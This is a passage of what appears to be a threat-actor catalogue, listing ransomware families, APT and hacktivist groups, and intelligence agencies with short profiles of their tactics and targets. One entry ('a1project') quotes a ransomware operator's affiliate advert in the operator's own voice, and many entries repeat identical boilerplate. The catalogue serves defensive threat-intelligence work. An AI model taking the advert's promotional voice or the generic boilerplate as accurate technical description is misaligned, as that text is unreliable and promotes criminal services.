Threat Actors

05250lock

Ransomware

0apt

This group is newly observed, and first observations suggest it is not a serious group, as most - if not all - of its claims cannot be validated and refer to random company names.
Analysis of available GitHub repositories and sandbox detonations suggests the actor lists those sandbox runs as victims.
The extracted data should be approached with a high degree of caution.

0kilobypt

Ransomware

0Mega

0mega, a new ransomware operation, has been observed targeting organizations around the world. The ransomware operators are launching double-extortion attacks and demanding millions of dollars as ransom. The 0mega ransomware operation launched in May and has already claimed multiple victims. 0mega maintains a dedicated data leak site that the attackers use to post stolen data if the demanded ransom is not paid. The leak site currently hosts 152 GB of data stolen from an electronics repair firm in an attack that happened in May. An additional victim has since been removed from the site, implying that they might have paid the ransom to the 0mega group. How does it work? The attackers add the .0mega extension to the names of encrypted files and create ransom notes (DECRYPT-FILES[.]txt). The ransom note contains a link to a Tor payment negotiation site with a support chat for contacting the ransomware group. To log in to this site, victims are asked to upload their ransom notes, which contain a unique Base64-encoded blob identity.

10001

Ransomware

1337-Locker

Ransomware

1937CN

1937CN is a Chinese hacking group that has been active since at least 2013. The group is known for targeting Vietnamese organizations, including government agencies, businesses, and media outlets. 1937CN has been linked to a number of high-profile cyberattacks, including the hacking of Vietnam Airlines in 2016 and the defacement of Vietnamese government websites in 2015.

2023lock

2023Lock is a ransomware strain first observed in January 2024, believed to be an evolution of the Venus and Zeoticus families and a direct precursor to the later TrinityLock variant. It employs a hybrid encryption method combining XChaCha20 and curve25519xsalsa20poly1305, appending the “.2023lock” extension to encrypted files. Upon infection, it delivers ransom notes in HTML, TXT, and HTA formats containing decryption instructions. Unlike many modern ransomware groups, there is no evidence that 2023Lock engages in double extortion or data exfiltration, operating purely through file encryption to pressure victims into payment. Its codebase and operational patterns strongly align with TrinityLock, which emerged a few months later with more sophisticated extortion tactics.

20dfs

Ransomware

24H

Ransomware

313 Team

313 Team is an Iraq-based threat actor that has conducted coordinated DDoS campaigns targeting multiple government servers in the UAE, Kuwait, and Romania, often in response to political statements. They have claimed responsibility for significant disruptions, including a one-hour shutdown of Romania’s National Tax Agency and an 18-hour outage of Kuwait's national e-government portal. The group has also engaged in website defacements, showcasing coordinated branding with other aligned groups. Their operations reflect a focus on government infrastructure, employing DDoS techniques and leveraging public political discourse as justification for their attacks.

32aa

Ransomware

3am

3AM, also known as ThreeAM, is a relatively new ransomware family that emerged in late 2023, initially deployed as a fallback option when LockBit infections failed. Written in Rust for 64-bit systems, it appends the “.threeamtime” extension to encrypted files and tags them with the marker “0x666,” while deleting Volume Shadow Copies to hinder recovery. 3AM operators use a double extortion strategy, combining file encryption with data theft and threats to leak stolen information. More recent campaigns have shown increased sophistication, incorporating email bombing followed by vishing calls to convince victims to grant remote access via Microsoft Quick Assist. Attackers then deploy virtual machines containing backdoors, allowing them to remain undetected while exfiltrating data before attempting to launch the ransomware payload.

3nCRY

Ransomware

4rw5w

Ransomware

5ss5c (5ss5cCrypt)

Ransomware

5ss5c Ransomware

The cybercrime group that brought us Satan, DBGer and Lucky ransomware and perhaps Iron ransomware, has now come up with a new version or rebranding named 5ss5c. [...] It will however only encrypt files with the following extensions: 7z, bak, cer, csv, db, dbf, dmp, docx, eps, ldf, mdb, mdf, myd, myi, ora, pdf, pem, pfx, ppt, pptx, psd, rar, rtf, sql, tar, txt, vdi, vmdk, vmx, xls, xlsx, zip

610 Office

610 Office

68-Random-HEX

Ransomware

777 (Legion)

Ransomware

777

Ransomware

7ev3n

Ransomware

7h9r

Ransomware

7z Portuguese

Ransomware

7Zipper Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and similar vectors. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos and shared online files.

8Base Ransomware Actors

This object represents the behaviors associated with operators of 8Base ransomware, who may or may not operate as a cohesive unit. Behaviors associated with samples of 8Base ransomware are represented in the "8Base Ransomware" Software object. The 8Base ransomware operation began claiming significant numbers of victims on its data leak site in June 2023, including organizations in a range of sectors. Researchers have observed considerable similarities between aspects of 8Base's operations and those of other ransomware groups, leading them to suspect that 8Base may be an evolution or offshoot of existing operations. The language in 8Base's ransom notes is similar to the language seen in RansomHouse's notes, and there is strong overlap between the code of Phobos ransomware and 8Base.[[VMWare 8Base June 28 2023](/references/573e9520-6181-4535-9ed3-2338688a8e9f)][[Acronis 8Base July 17 2023](/references/c9822477-1578-4068-9882-41e4d6eaee3f)]

8base

8Base emerged in early 2022 and rapidly escalated its ransomware operations by mid-2023, positioning itself as a “simple pen tester” while executing a relentless double-extortion scheme: encrypting files using AES-256 CBC mode (appending the “.8base” extension) and threatening to leak stolen data via a Tor-accessible leak site. The group leverages initial access methods such as phishing and SmokeLoader, disables security mechanisms like Volume Shadow Copy and firewalls, and deploys persistence via registry and startup entries. Targeting primarily small and medium-sized organizations across sectors such as manufacturing, finance, IT, and healthcare in regions including the U.S., Brazil, and Europe, 8Base has drawn comparisons to Phobos and RansomHouse for its tactics and ransom-note style. In early 2025, international law enforcement operations disrupted the group, resulting in the arrest of four key actors, seizure of servers, and warnings to hundreds of potential victims.

8lock8

Ransomware based on HiddenTear

a1project

The locker is written in C/C++/ASM.
It supports all systems starting from Windows 2003, has a separate binary for ESXi, and uses a unified encrypted file format across all systems.
WINDOWS:
• Two encryption modes: patch-based and file header.
• Extensive configuration settings: from ignoring specific paths/extensions to terminating services/processes, unlocking occupied files, working with network shares, and more.
• Arguments available for shutting down Hyper-V virtual machines, deleting backups, network scanning with logged-in user tokens.
• Each build includes an obfuscated PowerShell script.
• Execution is password-protected.
• The locker itself is shellcode for x86/x64; if you have custom execution methods, we can provide the shellcode.
ESXI:
• Encrypts files in patches, with configurable path exclusions.
The default configuration is pre-set to avoid disrupting Windows/ESXi/Linux systems.

Our commission is 20% of payouts

AAC

Ransomware

Ababil of Minab

Ababil of Minab is an emerging pro-Iranian hacktivist group with a limited public profile and little verifiable prior activity in threat intelligence reporting. The group claims responsibility for a cyberattack and allegedly possesses administrative access to targeted systems. Their pro-Iran messaging and targeting of a major US public transit authority align with known patterns of Iranian-aligned actors targeting US critical infrastructure. The use of escalatory language suggests potential for further activity.

ABCLocker

Ransomware

Abyss Data

Abyss‑Data, also known as Abyss Locker, is a ransomware operation first identified around March 2023. It conducts double extortion by exfiltrating data and encrypting systems—particularly targeting VMware ESXi virtual environments—then threatening to leak stolen data via a TOR-based leak site if ransom demands aren't met. The group’s Linux variant derives from the Babuk ransomware source code with encryption resembling HelloKitty, using ChaCha–based ciphers. On Windows, Abyss Locker encrypts files (typically appending “.abyss” or randomized extensions), deletes Volume Shadow Copies, manipulates boot policy to disable recovery, and delivers ransom notes (e.g., WhatHappened.txt), often replacing the desktop wallpaper as part of its extortion tactics. Its campaigns have targeted diverse industries—finance, healthcare, manufacturing, technology—across multiple regions, with victim lists prominently featuring organizations in North America.

Acroware Cryptolocker Ransomware

Leo discovered a screenlocker that calls itself Acroware Cryptolocker Ransomware. It does not encrypt.

Actor240524

Actor240524 is a newly identified APT group that targeted Azerbaijani and Israeli diplomats through spear-phishing emails to steal sensitive data. The group employs a Trojan program known as ABCloader and ABCsync, demonstrating capabilities to steal secrets and modify file data. Their operations appear to focus on undermining the cooperative relationship between Azerbaijan and Israel. Actor240524 utilizes various countermeasures to obscure their attack tactics and techniques.

AdamLocker Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and similar vectors. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos and shared online files. The name of the creator is puff69.

Administration for Security and Counterintelligence

Administration for Security and Counterintelligence (Uprava za bezbednost i kontrarazuznavanje) (Police Agency)

adminlocker

AdminLocker was first observed around December 2021 and appears to be a lone operator or small group, with no clear Ransomware-as-a-Service (RaaS) model reported. It uses single-extortion tactics—encrypting files without publicly documented data exfiltration—primarily targeting enterprise and personal systems via methods such as malicious email attachments, cracked software installers, P2P downloads, and malvertising. The ransomware employs symmetric and asymmetric encryption (likely AES combined with RSA) to lock files, appending extensions such as .admin1, .admin2, .admin3, .1admin, .2admin, and .3admin; victims receive a “!!!Recovery File.txt” ransom note with instructions to pay via Tor and Bitcoin. Notable for its multiple simultaneous variants with varied extensions, it reportedly allows victims to decrypt up to five small files as “proof” before demanding ransom. No high-profile sector- or region-specific campaigns are publicly documented.

Adonis

Ransomware

Adrastea

Adrastea is a threat actor who has been active on cybercrime forums, claiming to have breached organizations like MBDA and offering stolen data for sale. They describe themselves as a group of independent cybersecurity experts and researchers. Adrastea has been linked to ransomware operations, data leak platforms, and network access groups. The actor has been known to exploit critical vulnerabilities in target organizations' infrastructure to gain access to sensitive data.

AepCrypt

Ransomware

AeroBlade

AeroBlade is a previously unknown threat actor that has been targeting an aerospace organization in the United States. Their objective appears to be conducting commercial and competitive cyber espionage. They employ spear-phishing as a delivery mechanism, using weaponized documents with embedded remote template injection techniques and malicious VBA macro code. The attacks have been ongoing since September 2022, with multiple phases identified in the attack chain. The origin and precise objective of AeroBlade remain unknown.

AES_KEY_GEN_ASSIST Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and similar vectors. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos and shared online files.

AES-Matrix

Ransomware

AES-NI: April Edition

Ransomware

AES-NI Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and similar vectors. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos and shared online files.

AESMew

Ransomware

Afrodita

Ransomware

Agence nationale de sécurité

Agence nationale de sécurité (ANS)

Agencia Nacional de Inteligencia

National Intelligence Agency (ANI) – Agencia Nacional de Inteligencia

Agencja Bezpieczeństwa Wewnętrznego

Internal Security Agency - Agencja Bezpieczeństwa Wewnętrznego (ABW)

Agencja Wywiadu

Foreign Intelligence Agency - Agencja Wywiadu (AW)

Agenda Ransomware

Ransomware

Agenzia Informazioni e Sicurezza Esterna

Agenzia Informazioni e Sicurezza Esterna (AISE) - Agency for External Information and Security

Agenzia Informazioni e Sicurezza Interna

Agenzia Informazioni e Sicurezza Interna (AISI) - Agency for Internal Information and Security

Aggressive Inventory Zombies

Aggressive Inventory Zombies is a threat actor involved in a large-scale phishing and pig-butchering network targeting retail brands and cryptocurrency users. They create fraudulent sites using a popular website template that scrapes product details from legitimate e-commerce platforms and integrate chat services for phishing. Financial ties to India have been identified, and collaboration with Stark Industries has led to the dismantling of parts of their infrastructure, revealing the network's breadth. AIZ is also linked to Entropy ransomware infections, which were preceded by detections of Cobalt Strike beacons and Dridex malware.

aGl0bGVyCg

Ransomware

ailock

AiLock is a Ransomware-as-a-Service (RaaS) group first identified in March 2025. It employs a double-extortion approach—encrypting files and threatening to report breaches to regulators or share stolen data with competitors if the ransom isn’t paid. Victims have just 72 hours to respond and up to five days to pay; failure to pay results in data leaks and destruction of recovery tools. The ransomware appends the extension .AiLock to encrypted files, changes file icons to a green padlock with the “AiLock” name, and replaces the desktop wallpaper with a distinctive robot-skull logo. It employs a hybrid encryption scheme, combining ChaCha20 for file encryption with NTRUEncrypt for securing metadata, and uses a multi-threaded design (path-traversal and encryption threads with IOCP) for efficiency. While active campaigns and leak sites are confirmed, specific sectors, regions, and intrusion methods remain undisclosed in public sources.

Air Force Intelligence Department

Air Force Intelligence Department (military intelligence)

Air Force Intelligence Directorate

Air Force Intelligence Directorate

Air Intelligence (Pakistan)

Air Intelligence (AI)

AiraCrop Ransomware

This is most likely to affect English-speaking users, since the ransom note is written in English; as English is understood worldwide, anyone can be harmed. The attacker spreads the malware using email spam, fake updates and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos and shared online files.

AiraCrop

Ransomware related to TeamXRat

Akira

Akira is a ransomware variant and ransomware deployment entity active since at least March 2023. [Arctic Wolf Akira 2023](https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/) Akira uses compromised credentials to access single-factor external access mechanisms such as VPNs for initial access, then various publicly-available tools and techniques for lateral movement. [Arctic Wolf Akira 2023](https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/) [Secureworks GOLD SAHARA](https://www.secureworks.com/research/threat-profiles/gold-sahara) Akira operations are associated with "double extortion" ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Technical analysis of Akira ransomware indicates variants capable of targeting Windows or VMWare ESXi hypervisors and multiple overlaps with Conti ransomware. [BushidoToken Akira 2023](https://blog.bushidotoken.net/2023/09/tracking-adversaries-akira-another.html) [CISA Akira Ransomware APR 2024](https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf) [Cisco Akira Ransomware OCT 2024](https://blog.talosintelligence.com/akira-ransomware-continues-to-evolve/)

Ako

Once installed, Ako will attempt to delete Volume Shadow Copies and disable recovery services. It will then begin to encrypt all files that do not match a hard-coded list using an unknown algorithm. Whilst this is happening, Ako will scan the affected network for any connected devices or drives for it to propagate to.

Al Mukhabarat Al A'amah

General Intelligence Presidency (GIP) – رئاسة الاستخبارات العامة

Al-Namrood

Ransomware

Alcatraz Locker Ransomware

This is most likely to affect English-speaking users, since the ransom note is written in English; as English is understood worldwide, anyone can be harmed. The attacker spreads the malware using email spam, fake updates and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos and shared online files.

Alco

Ransomware

ALFA Ransomware

Ransomware made by the creators of Cerber

All_Your_Documents Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and similar vectors. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos and shared online files.

ALLANITE

Adversaries abusing ICS (based on Dragos Inc adversary list). ALLANITE accesses business and industrial control (ICS) networks, conducts reconnaissance, and gathers intelligence in United States and United Kingdom electric utility sectors. Dragos assesses with moderate confidence that ALLANITE operators continue to maintain ICS network access to: (1) understand the operational environment necessary to develop disruptive capabilities, (2) have ready access from which to disrupt electric utilities. ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks, including collecting and distributing screenshots of industrial control systems. ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities. ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system.

AllCry

Ransomware

AlldataLocker

Ransomware

Alma Ransomware

Ransomware

Alpha Ransomware

Ransomware

Alpha Spider

ALPHA SPIDER is a threat actor known for developing and operating the Alphv ransomware as a service. They have been observed using novel offensive techniques, such as exploiting software vulnerabilities and leveraging legitimate administration tools for malicious activities. ALPHA SPIDER affiliates have demonstrated persistence in exfiltrating data and have shown the ability to bypass security measures like DNS-based filtering and multifactor authentication. Despite lacking specific operational security measures, defenders have opportunities to detect and respond to ALPHA SPIDER's operations effectively.

Alphabet Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and similar vectors. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos and shared online files. This ransomware poses as the Windows 10 Critical Update Service: it offers to update Windows 10 but instead encrypts the victim's files. For a successful attack, the victim must have .NET Framework 4.5.2 installed on their computer.

Altahrea Team

Altahrea Team is a pro-Iranian hacking group that has been active since at least 2020. The group has claimed responsibility for a number of cyberattacks, including DDoS attacks against Israeli websites, a hack of the Israel Airports Authority website, and a cyberattack on the Orot Yosef power plant in Israel.

ALTDOS

ALTDOS is a threat actor group that has targeted entities in Southeast Asia, including Singapore, Thailand, and Malaysia. They have been involved in data breaches of companies in various sectors, such as real estate and retail, compromising sensitive information like customer names, bank account numbers, and transaction details. ALTDOS uses tactics like ransomware attacks, data exfiltration, and dumping data publicly or for sale on underground forums. The group has been known to demand ransom payments from victims, but also leaks data if demands are not met.

Altoufan Team

ALTOUFAN TEAM is a politically motivated hacktivist group with anti-Zionism, anti-monarchy, and pro-14-February movement sentiments. They have targeted government agencies and organizations in Bahrain and Israel, claiming to support political causes in the region. The group has employed techniques such as credential theft to compromise systems, as demonstrated by their attack on Bahrain's Social Insurance Organization. ALTOUFAN maintains a presence on social media platforms to disseminate their messages and showcase their activities.

Amaranth-Dragon

Amaranth-Dragon is a previously untracked threat actor assessed to be closely linked to the China-affiliated APT 41 ecosystem, exhibiting similar tooling and operational patterns. The group demonstrated technical maturity by rapidly operationalizing CVE-2025-8088, a vulnerability in WinRAR, shortly after its public disclosure. Check Point Research has identified multiple campaigns targeting Cambodia, Thailand, Laos, Indonesia, Singapore, and the Philippines, with operations typically focused on one or two countries at a time. The overlaps in technical and operational indicators strongly suggest that Amaranth-Dragon is either affiliated with or part of the broader APT-41 ecosystem.

AMBA

Ransomware Websites only amba@riseup.net

Amjixius

Ransomware

Amnesia-2

Ransomware

Amnesia

Ransomware

Anatova

Ransomware

AnDROid

Ransomware

ANDROMEDA SPIDER

ANDROMEDA SPIDER is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Angela Merkel Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and similar vectors. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos and shared online files.

AngleWare

Ransomware

Angry Likho

Angry Likho is an APT group that has been active since 2023, primarily targeting large organizations and government agencies in Russia and Belarus. Their attacks typically involve spear-phishing emails with malicious attachments, such as RAR archives, and utilize a known payload, the Lumma stealer, for data exfiltration. The group employs a compact infrastructure and has been linked to espionage activities, particularly in sectors like aviation and pharmaceuticals. Their operations have shown a focus on collecting sensitive information, including cryptowallet files and user credentials.

AngryDuck Ransomware

This is most likely to affect English-speaking users, since the ransom note is written in English; as English is understood worldwide, anyone can be harmed. The attacker spreads the malware using email spam, fake updates and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos and shared online files. Demands 10 BTC.

AngryKite

Ransomware

AnimusLocker

Ransomware

Ank

Ank is an active extortion or ransomware group tracked by RansomLook.

Annabelle 2.1

Ransomware

Annabelle

Ransomware

AnonCrack

Ransomware

AnonPop

Ransomware

Anony

Ransomware based on HiddenTear

Anonymous (Collective)

Anonymous is a decentralized international group of hacktivists known for carrying out cyber attacks against government bodies and corporations worldwide. Their activities often include distributed denial-of-service (DDoS) attacks, website defacements, and data leaks, primarily motivated by opposition to internet censorship, control, and various geopolitical issues.[[Cyber Security Agency of Singapore March 9 2022](/references/382b5b53-8f24-4e20-9493-ccc8187fef51)]

Anonymous KSA

Anonymous KSA is a Saudi hacking group that has executed cyber attacks targeting Indian institutions, including a significant breach of UIDAI's data storage units, leading to access to sensitive information and system disruption. The group claims these actions are in response to India's normalization of ties with Israel and its treatment of Palestinians. They have called for support for the Palestinian cause and accountability for the damage caused by their operations. The group's TTPs include targeting government agencies and leveraging public sentiment to justify their actions.

Anonymous Sudan

Since January 23, 2023, a threat actor identifying as "Anonymous Sudan" has been conducting denial of service (DDoS) attacks against multiple organizations in Sweden. This group claims to be "hacktivists," politically motivated hackers from Sudan. According to Truesec’s report, the threat actor has nothing to do with the online activists collectively known as Anonymous.

Anonymous64

Anonymous 64 is a group accused by China's national security ministry of attempting to gain control of web portals, outdoor electronic screens, and network television. The Ministry of State Security claims that Anonymous 64 is linked to a cyber unit within Taiwan's defense ministry and identifies three active-duty military personnel as its members. The MSS alleges that the group is involved in an influence operation within China, using hacktivism as a cover. The accusations suggest that Anonymous 64 engages in sabotage activities, prompting authorities to call for public reporting of such actions.

AnteFrigus

Ransomware

ANTHROPOID SPIDER

Publicly known as 'EmpireMonkey', ANTHROPOID SPIDER conducted phishing campaigns in February and March 2019, spoofing French, Norwegian and Belizean financial regulators and institutions. These campaigns used macro-enabled Microsoft documents to deliver the PowerShell Empire post-exploitation framework. ANTHROPOID SPIDER likely enabled a breach that allegedly involved fraudulent transfers over the SWIFT network.

Anti-DDos

Ransomware

Anti-Narcotics Force

Anti-Narcotics Force (ANF)

antibrok3rs

Antibrok3rs emerged as an access broker (not a ransomware operator itself) linked to the aftermath of the 2023 MOVEit supply-chain exploitation. From November 2024 through early 2025, this actor has posted stolen data from at least 15 energy-sector victims, including U.S. utilities such as CenterPoint Energy, Entergy, Nevada Energy, and Appalachian Power—data likely obtained via the MOVEit breach. While some analysts suspected ties to the Cl0P ransomware collective, Antibrok3rs publicly denied any such affiliation. The extortion model centers on data leakage without accompanying file encryption—a purely leak-based threat. No delivery, encryption, or ransom note behaviors have been observed, nor is there evidence of RaaS activity.

Antihacker2017 Ransomware

It is directed at Russian-speaking users and is therefore able to infect mostly the former USSR countries. It is spread using email spam, fake updates, attachments and similar vectors. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos and shared online files. The attacker goes by the nickname Antihacker and requests that the victim send him an email for decryption. He does not request any money, only issuing a warning about looking at porn (gay, incest and rape porn, to be specific).

Antihacker2017

Ransomware

Antix Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and similar vectors. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos and shared online files. The ransom is 0.25 bitcoins and the nickname of the attacker is FRC 2016.

Antlion

Antlion is a Chinese state-backed advanced persistent threat (APT) group that has been targeting financial institutions in Taiwan. This persistent campaign has lasted for at least 18 months.

Anubi NotBTCWare

Ransomware

Anubis Ransomware Group

Anubis is a ransomware group that emerged in late 2024, known for using double extortion tactics and operating as a ransomware-as-a-service (RaaS). They employ various monetization models, including data ransomware and access monetization affiliate programs. The group is suspected to have former affiliates of other ransomware groups and is active on cybercrime forums like RAMP and XSS.[[Kelacyber February 25 2025](/references/321f34fb-b80b-4bd3-bceb-e51b6214b883)]

Anubis Ransomware

This is most likely to affect English-speaking users, since the ransom note is written in English; as English is understood worldwide, anyone can be harmed. The attacker spreads the malware using email spam, fake updates and harmful attachments. All of the victim's files are compromised, including music, MS Office and Open Office documents, pictures, videos and shared online files. EDA2.

Anubis

Anubis is a financially motivated cybercrime group primarily known for its banking trojan operations but also linked to ransomware activity targeting corporate networks. First identified in 2016 and evolving over time, Anubis ransomware attacks have targeted Windows systems, often deployed after initial compromises by the Anubis banking malware or other access vectors such as phishing, malicious email attachments, or exploitation of unpatched vulnerabilities. The group’s ransomware encrypts files using strong symmetric encryption algorithms, appending distinctive extensions and delivering ransom notes with payment instructions via Tor. Anubis has targeted multiple sectors worldwide, including finance, retail, and government, often combining ransomware with credential theft and data exfiltration to maximize pressure on victims. Its infrastructure and tactics overlap with other financially motivated actors, suggesting possible affiliate or shared tool usage within broader cybercriminal ecosystems.

Apocalypse-Missing

Ransomware

Apocalypse

Ransomware decryptionservice@mail.ru recoveryhelp@bk.ru ransomware.attack@list.ru esmeraldaencryption@mail.ru dr.compress@bk.ru

ApocalypseVM

Ransomware; a version of Apocalypse ransomware that uses VMProtect

ApolloLocker

Ransomware

Apos

Apos ransomware surfaced in April 2024 and is best characterized as a data‑broker or leak‑only operation, rather than a traditional file‑encryption ransomware. It has not been observed to conduct encryption, but instead focuses on data exfiltration with threats to leak or sell the stolen information. Targets span sectors such as technology, healthcare, manufacturing, business services, telecommunications, and government—with significant victimology in Brazil, the United States, India, France, Paraguay, and Spain. Reporting suggests its activity tapered off after a few incidents, possibly indicating a one-time campaign or short-lived operation. Though some sources list multiple victims, technical details such as encryption algorithms, ransom notes, or extortion pricing are not publicly documented. Apos is sometimes listed among new or industrial-focused threats observed in Q1 2025, but remains poorly defined in public technical intel.

AppMilad

AppMilad is an Iranian hacking group that has been identified as the source of a spyware campaign called RatMilad. This spyware is designed to silently infiltrate victims' devices and gather personal and corporate information, including private communications and photos. The group has been distributing the spyware through fake apps and targeting primarily Middle Eastern enterprises.

APT.3102

APT.3102 is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

毒云藤 - APT-C-01

APT-C-01, also known as 毒云藤, is an APT group that has long targeted entities within China and has been active since at least 2007. For 11 years it conducted cyber-espionage against key units and departments in China's defense, government, science and technology, education, and maritime sectors, focusing mainly on the military industry, China-US relations, cross-strait relations, and maritime affairs, with the aim of stealing major decision-making and sensitive information. APT-C-01 was first disclosed by the 360 Threat Intelligence Center, which named it 毒云藤 (literally "poison cloud vine") after a climbing vine common in the region associated with the group.

美人鱼 - APT-C-07

The 美人鱼 (literally "Mermaid") group (APT-C-07) is a foreign APT group from the Middle East that has been active for 9 years. It conducts cyber-espionage mainly against government agencies with the aim of stealing sensitive information, and it has been confirmed to have attacked the Danish Ministry of Foreign Affairs.

APT-C-12

According to 360 TIC the actor has carried out continuous cyber espionage activities since 2011 on key units and departments of the Chinese government, military industry, scientific research, and finance. The organization focuses on information related to the nuclear industry and scientific research. The targets were mainly concentrated in mainland China...[M]ore than 670 malware samples have been collected from the group, including more than 60 malicious plugins specifically for lateral movement; more than 40 C2 domain names and IPs related to the organization have also been discovered.

人面狮 - APT-C-15

Operation 人面狮 (literally "Sphinx") is a cyber-espionage campaign active in the Middle East. Its main targets probably include various organizations in countries such as Egypt and Israel, and its goal is to steal sensitive data from those targets. Activity was concentrated mainly between June 2014 and November 2015, and related attack activity can be traced back as early as December 2011. The campaign mainly used social networks for watering-hole attacks; to date a total of 314 malicious code samples and 7 C&C domains have been captured.

APT-C-27

A threat actor that has been active since at least November 2014. This group launched long-term attacks against organizations in the Syrian region using Android and Windows malware. Its objective is the theft of sensitive information.

潜行者 - APT-C-30

The 潜行者 (literally "Stalker") group mainly collects sensitive information from government agencies, defense departments, intelligence agencies, and similar bodies in Southeast Asian countries; against China alone it has carried out network attacks for more than ten years. It mainly targets key units in government, telecommunications, and other fields. Its attacks can be traced back to 2009, the earliest sample has a compile time of 2008, and attack activity continues to the present.

毒针 - APT-C-31

On 25 November 2018, 360's Advanced Threat Response Team was the first worldwide to discover an APT attack against Russia, targeting a medical institution belonging to the Office of the President of Russia. The attack used the Flash 0-day vulnerability CVE-2018-15982 and Hacking Team's RCS backdoor. Taking into account the functional characteristics of the targeted medical institution, 360 named this APT attack Operation 毒针 (literally "Poison Needle").

APT-C-34

As reported by ZDNet, Chinese cyber-security vendor Qihoo 360 published a report on 2019-11-29 exposing an extensive hacking operation targeting the country of Kazakhstan. Targets included individuals and organizations involving all walks of life, such as government agencies, military personnel, foreign diplomats, researchers, journalists, private companies, the educational sector, religious figures, government dissidents, and foreign diplomats alike. The campaign, Qihoo 360 said, was broad, and appears to have been carried by a threat actor with considerable resources, and one who had the ability to develop their private hacking tools, buy expensive spyware off the surveillance market, and even invest in radio communications interception hardware.

拍拍熊 - APT-C-37

The 拍拍熊 group (APT-C-37) has carried out organized, planned, targeted, and sustained attacks against the extremist organization "Islamic State"; its attack platforms are Windows and Android.

军刀狮 - APT-C-38

From July 2015 to the present, the 军刀狮 (literally "Saber Lion") group (APT-C-38) has carried out organized, planned, targeted, and continuous attacks in the Middle East; its attack platforms are Windows and Android. One of the group's main characteristic targets is the Kurdish population of a certain country in West Asia/the Middle East, the PDB paths contained in its Windows RAT repeatedly include the string "Saber", and the Asiatic lion is the representative animal of that Middle Eastern country. Combining these with some other characteristics of the group and 360's naming rules for APT groups, we named the group 军刀狮 (APT-C-38).

蓝色魔眼 - APT-C-41

APT-C-41 is an APT group with a Turkish background whose earliest attack activity can be traced back to 2012. The group mainly attacks regions and countries including Italy, Turkey, Belgium, Syria, and Europe. In 2020, 360 discovered the group's attacks against relevant Chinese units and named it APT-C-41.

北非狐 - APT-C-44

The 北非狐 (literally "North African Fox") group (APT-C-44) is a foreign APT group from Algeria that has been active for 3 years. It mainly conducts cyber-espionage in the Middle East, chiefly to steal sensitive information. Related attack activity can be traced back to November 2017 and remains active today.

卢甘斯克组织 - APT-C-46

In early 2019, a foreign security vendor disclosed a targeted attack campaign against the Ukrainian government by an APT group suspected of having a Luhansk background. According to the analysis in the related report, the group's attack activity can be traced back to at least 2014. It has attacked Ukrainian government agencies extensively via phishing, watering-hole attacks, and similar methods, and in its past activity has used open-source malware such as Quasar RAT and VERMIN to capture targets' audio and video, steal passwords, obtain confidential files, and more.

APT-C-60

APT-C-60

腾云蛇 - APT-C-61

APT-C-61, also known as 腾云蛇 (literally "Cloud-Riding Snake"), has been active since at least January 2020 and remains highly active. Its main targets are important sectors such as state institutions, the military industry, scientific research, and defense in countries including Pakistan and Bangladesh. It penetrates targets with spear-phishing emails combined with social-engineering techniques, delivers malicious programs to target devices, covertly controls them, and continuously steals sensitive files from them. It got its name because its C2, payload delivery, and storage of stolen data all rely on cloud services, and because its trojan is written in Python.

APT Ransomware v.2

This is most likely to affect English-speaking users, since the ransom note is written in English; however, English is understood worldwide, so anyone can be harmed. The attackers spread the malware using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office and OpenOffice documents, pictures, videos, shared online files, and more. There is no point in paying the ransom: the files are completely destroyed.

Axiom

Axiom is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between Axiom and Winnti Group but the two groups appear to be distinct based on differences in reporting on TTPs and targeting. [Kaspersky Winnti April 2013](https://securelist.com/winnti-more-than-just-a-game/37029/) [Kaspersky Winnti June 2015](https://securelist.com/games-are-over/70991/) [Novetta Winnti April 2015](https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf)

Moafee

Moafee is a threat group that appears to operate from the Guangdong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group DragonOK. [Haq 2014](https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html)

Cleaver

